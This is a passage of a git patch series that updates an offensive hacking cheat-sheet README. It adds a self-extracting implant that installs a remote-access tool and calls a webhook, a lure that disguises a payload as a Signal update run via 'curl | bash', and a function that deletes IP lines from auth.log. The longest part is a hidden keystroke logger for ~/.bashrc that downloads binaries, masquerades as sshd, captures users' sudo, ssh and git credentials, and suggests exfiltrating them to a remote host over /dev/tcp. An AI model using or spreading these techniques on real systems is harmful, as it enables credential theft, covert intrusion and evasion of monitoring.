From 124abc268d3f91b1f65f653f730c9e098b5f051e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 19 Apr 2024 10:00:05 +0100
Subject: [PATCH 01/37] Update README.md
---
README.md | 28 ++++++++++++++++++++++++++++
1 file changed, 28 insertions(+)
diff --git a/README.md b/README.md
index 487822e..ddfba80 100644
--- a/README.md
+++ b/README.md
@@ -75,6 +75,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Remote access an entire network](#backdoor-network)
1. [Smallest PHP backdoor](#carriage-return-backdoor)
1. [Local Root backdoor](#ld-backdoor)
+ 1. [Self-extracting implant](#implant)
1. [Host Recon](#hostrecon)
1. [Shell Hacks](#shell-hacks)
1. [Shred files (secure delete)](#shred)
@@ -1605,6 +1606,33 @@ Become root
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
```
+
+**6.vi. Self-Extracting implant**
+
+Create a self-extracting shell-script using [mkegg.sh](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/mkegg.sh) (see source for examples).
+
+Simple example:
+```sh
+# Create implant 'egg.sh' containing the file 'foo'
+# and the directory 'warez'. When executing 'egg.sh' then
+# extract 'foo' and 'warez' and call 'warez/run/sh'
+./mkegg.sh egg.sh foo warez warez/run.sh
+```
+
+Real world examples are best:
+1. Create an implant that installs gsocket and calls our webhook on success:
+```sh
+./mkegg.sh egg.sh deploy-all.sh '(GS_WEBHOOK_KEY=e90d4b38-8285-490d-b5ab-a6d5c7c990a7 deploy-all.sh 2>/dev/null >/dev/null &)'
+# On the target system do: 'cat egg.sh | bash' or './egg.sh'
+```
+
+2. Rename `egg.sh` to `update-for-fools.txt` and upload as blob to [Signal's](https://www.signal.org/) GitHub repository.
+
+3. Don't fool people to update Signal using this command ❤️:
+```sh
+curl -fL https://github.com/signalapp/Signal-Desktop/files/15037868/update-for-fools.txt | bash
+```
+
## 7. Host Recon
---
From 1d774a5d0a73622f0e3ae8713e72fa690bf376f2 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 22 Apr 2024 20:42:34 +0100
Subject: [PATCH 02/37] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index ddfba80..07c19cd 100644
--- a/README.md
+++ b/README.md
@@ -2107,6 +2107,7 @@ System Information Gathering
1. `curl -fsSL https://thc.org/ws | bash` - Show all domains hosted on a server + system-information
1. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS - Quick system informations for hackers.
1. https://github.com/zMarch/Orc - Post-exploit tool to find local RCE (type `getexploit` after install)
+1. https://github.com/The-Z-Labs/linux-exploit-suggester - Suggest exploits based on versions on target system
1. https://github.com/efchatz/pandora - Windows: dump password from various password managers
Backdoors
From 9b0ad766ab247ff70897f489876aaa4820714ce3 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 24 Apr 2024 07:47:08 +0100
Subject: [PATCH 03/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 07c19cd..26e0196 100644
--- a/README.md
+++ b/README.md
@@ -1687,7 +1687,7 @@ curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16
Using `grep`:
```sh
# Find passwords (without garbage).
-grep -HEronasir '.{16}password.{,64}' .
+grep -HEronasi '.{16}password.{,64}' .
# Find TLS or OpenSSH keys:
grep -r -F -- " PRIVATE KEY-----" .
```
From 8e1120d6f585bd180e98d6d12097b62a5113cd50 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 24 Apr 2024 08:46:15 +0100
Subject: [PATCH 04/37] Update README.md
---
README.md | 30 +++++++++++++++++++++---------
1 file changed, 21 insertions(+), 9 deletions(-)
diff --git a/README.md b/README.md
index 26e0196..aa238c2 100644
--- a/README.md
+++ b/README.md
@@ -1660,7 +1660,7 @@ find / -xdev -type f -perm /6000 -ls 2>/dev/null
```
Find all writeable directories:
-```sh
+```bash
wfind() {
local arr dir
@@ -1676,11 +1676,11 @@ wfind() {
# Usage: wfind /etc /var /usr
```
-Find local passwords (using noseyparker):
+Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker):
```sh
-curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16.0/noseyparker-v0.16.0-x86_64-unknown-linux-gnu.tar.gz | tar xvfz - --transform="flags=r;s|.*/||" --no-anchored --wildcards noseyparker && \
-./noseyparker scan . && \
-./noseyparker report
+curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static
+./np scan . && \
+./np report
```
(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history)
@@ -1692,6 +1692,20 @@ grep -HEronasi '.{16}password.{,64}' .
grep -r -F -- " PRIVATE KEY-----" .
```
+Find Subdomains in files:
+```bash
+find_subdomains() {
+ local d="${1}"
+ local rexf='[0-9a-z.-]{0,64}'"${d}"
+ local rex="$rexf"'([^a-z0-9]{1}|$)'
+ [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; }
+ shift 1
+ [ $# -le 0 ] && [ -t 0 ] && set -- .
+ command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eo "$rexf"; return; }
+ grep -Eaohr "$rex" "$@" | grep -Eo "$rexf"
+}
+```
+
---
## 8. Shell Hacks
@@ -1734,10 +1748,8 @@ This will reset the logfile to 0 without having to restart syslogd etc:
This will remove any line containing the IP `1.2.3.4` from the log file:
```sh
-xlog() {
- local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"
-}
-xlog "1\.2\.3\.4" /var/log/auth.log
+xlog() { local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"; }
+# xlog "1\.2\.3\.4" /var/log/auth.log
# xlog "${SSH_CLIENT%% *}" /var/log/auth.log
# xlog "^2023.* thc\.org" foo.log
```
From fe13d06bb4dde12bd6f0180ce7955df38975b0cc Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 25 Apr 2024 09:19:05 +0100
Subject: [PATCH 05/37] Update README.md
---
README.md | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index aa238c2..476bc92 100644
--- a/README.md
+++ b/README.md
@@ -1692,18 +1692,20 @@ grep -HEronasi '.{16}password.{,64}' .
grep -r -F -- " PRIVATE KEY-----" .
```
-Find Subdomains in files:
+Find Subdomains or emails in files:
```bash
find_subdomains() {
local d="${1}"
- local rexf='[0-9a-z.-]{0,64}'"${d}"
- local rex="$rexf"'([^a-z0-9]{1}|$)'
+ local rexf='[0-9a-zA-Z_.-]{0,64}'"${d}"
+ local rex="$rexf"'([^0-9a-zA-Z_]{1}|$)'
[ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; }
shift 1
[ $# -le 0 ] && [ -t 0 ] && set -- .
command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eo "$rexf"; return; }
grep -Eaohr "$rex" "$@" | grep -Eo "$rexf"
}
+# find_subdomain foobar.com
+# find_subdomain @gmail.com
```
---
From 8cc9099237075e994412acff36c3b5d25d6e8a20 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 10:33:13 +0100
Subject: [PATCH 06/37] Update README.md
---
README.md | 21 +++++++++++++++------
1 file changed, 15 insertions(+), 6 deletions(-)
diff --git a/README.md b/README.md
index 476bc92..bd8af4f 100644
--- a/README.md
+++ b/README.md
@@ -231,8 +231,7 @@ echo 'ps(){ command ps "$@" | exec -a GREP grep -Fv -e nmap -e GREP; }' >>~/.ba
This requires root privileges and is an old Linux trick by over-mounting /proc/<pid> with a useless directory:
```sh
-hide()
-{
+hide() {
[[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }
_pid=${1:-$$}
[[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[THC] PID $_pid is now hidden"; return; }
@@ -1889,13 +1888,23 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.
**10.i Sniff a user's SHELL session with script**
-A method to log the shell session of a user (who logged in via SSH).
+A method to log the shell session of a user. Useful when you are not root but still like to capture the sudo/ssh credentials of the user. Records the user's keystrokes to `~/.config/.pty/.@*`.
-The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in:
+Cut & paste the following and follow the instructions:
```sh
-echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile
+{ mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
+&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x896_64}_Linux/Baseutils/script" \
+&& chmod 755 ~/.config/.pty/sshd@pty0 \
+&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
+&& chmod 755 ~/.config/.pty/clear \
+&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
+&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m]'
```
-Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
+
+- Combined with zapper to hide command options from the process list.
+- Requires util-linux >= 2.37 (-I flag). We pull the static bin from [ajam](https://bin.ajam.dev).
+- Consider using /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
+- Log in with `ssh -o "SetEnv LC_PTY=1"` to disable logging.
**10.ii Sniff all SHELL sessions with dtrace - FreeBSD**
From b2e65a861e4be518f996926359c6ca92543ab1d2 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 10:40:50 +0100
Subject: [PATCH 07/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index bd8af4f..4837206 100644
--- a/README.md
+++ b/README.md
@@ -1893,7 +1893,7 @@ A method to log the shell session of a user. Useful when you are not root but st
Cut & paste the following and follow the instructions:
```sh
{ mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
-&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x896_64}_Linux/Baseutils/script" \
+&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \
&& chmod 755 ~/.config/.pty/sshd@pty0 \
&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
&& chmod 755 ~/.config/.pty/clear \
From f89debe4f5a484fe49b434d207f5cde3d40bcccd Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 10:41:37 +0100
Subject: [PATCH 08/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 4837206..8667778 100644
--- a/README.md
+++ b/README.md
@@ -1898,7 +1898,7 @@ Cut & paste the following and follow the instructions:
&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
&& chmod 755 ~/.config/.pty/clear \
&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
-&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m]'
+&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m'
```
- Combined with zapper to hide command options from the process list.
From fe0dba1f9df35f8765d12b4e2b096dd88926dca6 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 12:00:08 +0100
Subject: [PATCH 09/37] Update README.md
---
README.md | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index 8667778..eb582db 100644
--- a/README.md
+++ b/README.md
@@ -91,7 +91,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [EncFS](#encfs)
1. [Encrypting a file](#encrypting-file)
1. [SSH session sniffing and hijacking](#ssh-sniffing)
- 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script)
+ 1. [Sniff a user's SHELL session](#session-sniffing)
2. [Sniff all SHELL sessions with dtrace](#dtrace)
2. [Sniff all SHELL sessions with eBPF](#bpf)
1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace)
@@ -1885,10 +1885,10 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.
---
## 10. SSH Sniffing
-
-**10.i Sniff a user's SHELL session with script**
+
+**10.i Sniff a user's SHELL session**
-A method to log the shell session of a user. Useful when you are not root but still like to capture the sudo/ssh credentials of the user. Records the user's keystrokes to `~/.config/.pty/.@*`.
+Records the user's keystrokes to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user.
Cut & paste the following and follow the instructions:
```sh
@@ -1902,7 +1902,7 @@ Cut & paste the following and follow the instructions:
```
- Combined with zapper to hide command options from the process list.
-- Requires util-linux >= 2.37 (-I flag). We pull the static bin from [ajam](https://bin.ajam.dev).
+- Requires `/usr/bin/script` from util-linux >= 2.37 (-I flag). We pull the static bin from [ajam](https://bin.ajam.dev).
- Consider using /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host.
- Log in with `ssh -o "SetEnv LC_PTY=1"` to disable logging.
From 3853a70a2b80c55ef707b4aa308037d663b2a57d Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 16:36:22 +0100
Subject: [PATCH 10/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index eb582db..79e57cc 100644
--- a/README.md
+++ b/README.md
@@ -1888,7 +1888,7 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.
**10.i Sniff a user's SHELL session**
-Records the user's keystrokes to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user.
+A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user.
Cut & paste the following and follow the instructions:
```sh
From 9066a0dd381348f541f7b1e6243d6d582ca411a9 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 19:38:48 +0100
Subject: [PATCH 11/37] Update README.md
---
README.md | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 79e57cc..fd5f133 100644
--- a/README.md
+++ b/README.md
@@ -1892,13 +1892,14 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co
Cut & paste the following and follow the instructions:
```sh
-{ mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
+{ [ -f /bixn/bash ] || echo "Not found: /bin/bash"; } \
+&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \
&& chmod 755 ~/.config/.pty/sshd@pty0 \
&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
&& chmod 755 ~/.config/.pty/clear \
&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
-&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e .config/.pty/clear ] && [ -e .config/.pty/sshd@pty0 ] && LC_PTY=1 exec .config/.pty/clear ".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ".config/.pty/.@pty-unix.$$"\e[0m'
+&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m'
```
- Combined with zapper to hide command options from the process list.
From 8cad376db8010e7e4ae0dc08a4e06f04de6bc5b6 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 19:49:29 +0100
Subject: [PATCH 12/37] Update README.md
---
README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index fd5f133..d57c920 100644
--- a/README.md
+++ b/README.md
@@ -1892,14 +1892,14 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co
Cut & paste the following and follow the instructions:
```sh
-{ [ -f /bixn/bash ] || echo "Not found: /bin/bash"; } \
+[ -f /bin/bash ] || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \
&& chmod 755 ~/.config/.pty/sshd@pty0 \
&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
&& chmod 755 ~/.config/.pty/clear \
&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
-&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/".config/.pty/sshd@pty0" -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m'
+&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m'
```
- Combined with zapper to hide command options from the process list.
From f7b41e22cc763889b005f6c2243396dd04654be4 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 20:24:16 +0100
Subject: [PATCH 13/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index d57c920..1b6cb25 100644
--- a/README.md
+++ b/README.md
@@ -1899,7 +1899,7 @@ Cut & paste the following and follow the instructions:
&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
&& chmod 755 ~/.config/.pty/clear \
&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
-&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/".config/.pty/.@pty-unix.$$"\e[0m'
+&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
```
- Combined with zapper to hide command options from the process list.
From b8ba48734a4b10b37f9bf4dedb7ce0ab5327bace Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 20:28:25 +0100
Subject: [PATCH 14/37] Update README.md
---
README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 1b6cb25..7e0bde4 100644
--- a/README.md
+++ b/README.md
@@ -1892,14 +1892,14 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co
Cut & paste the following and follow the instructions:
```sh
-[ -f /bin/bash ] || { echo "Not found: /bin/bash"; false; } \
+command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \
&& chmod 755 ~/.config/.pty/sshd@pty0 \
&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
&& chmod 755 ~/.config/.pty/clear \
&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
-&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash /bin/bash" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
+&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
```
- Combined with zapper to hide command options from the process list.
From b514269873a665335044626752d7ea4794a1d46b Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Apr 2024 22:48:35 +0100
Subject: [PATCH 15/37] Update README.md
---
README.md | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index 7e0bde4..3ab1e32 100644
--- a/README.md
+++ b/README.md
@@ -1894,12 +1894,12 @@ Cut & paste the following and follow the instructions:
```sh
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
-&& curl -o ~/.config/.pty/sshd@pty0 -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \
-&& chmod 755 ~/.config/.pty/sshd@pty0 \
-&& curl -o ~/.config/.pty/clear -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
-&& chmod 755 ~/.config/.pty/clear \
+&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \
+&& chmod 755 ~/.config/.pty/pty \
+&& curl -o ~/.config/.pty/ini -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
+&& chmod 755 ~/.config/.pty/ini \
&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
-&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -e ~/.config/.pty/clear ] && [ -e ~/.config/.pty/sshd@pty0 ] && LC_PTY=1 exec ~/.config/.pty/clear ~/.config/.pty/sshd@pty0 -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
+&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
```
- Combined with zapper to hide command options from the process list.
From 48333ea29238c627f7aa65be1a00b34cc67983ac Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 28 Apr 2024 08:40:50 +0100
Subject: [PATCH 16/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 3ab1e32..aa753dc 100644
--- a/README.md
+++ b/README.md
@@ -1890,7 +1890,7 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.
A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.config/.pty/.@*`. Useful when not root and needing to capture the sudo/ssh/git credentials of the user.
-Cut & paste the following and follow the instructions:
+Deploy: Cut & paste the following onto the target and follow the instructions:
```sh
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
From 23bdb7e2236f7bdd50af65d84ae02bb8108b9618 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 28 Apr 2024 10:34:16 +0100
Subject: [PATCH 17/37] Update README.md
---
README.md | 13 ++++++-------
1 file changed, 6 insertions(+), 7 deletions(-)
diff --git a/README.md b/README.md
index aa753dc..e326505 100644
--- a/README.md
+++ b/README.md
@@ -1893,13 +1893,12 @@ A 1-liner for `~/.bashrc` to sniff the user's keystrokes and save them to `~/.co
Deploy: Cut & paste the following onto the target and follow the instructions:
```sh
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
-&& { mkdir -p ~/.config/.pty 2>/dev/null; [ $(uname -m) == aarch64 ] && s=aarch64_arm64; :; } \
-&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/${s:-x86_64}_Linux/Baseutils/script" \
-&& chmod 755 ~/.config/.pty/pty \
-&& curl -o ~/.config/.pty/ini -fsSL https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m) \
-&& chmod 755 ~/.config/.pty/ini \
-&& echo 'SUCCESS. Add this to the ~/.bashrc:' \
-&& echo -e '\e[0;35m[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
+&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
+&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
+&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
+&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
+&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
+&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
```
- Combined with zapper to hide command options from the process list.
From 0504218fd5d0ee726f42aad054265d3e7eaec253 Mon Sep 17 00:00:00 2001
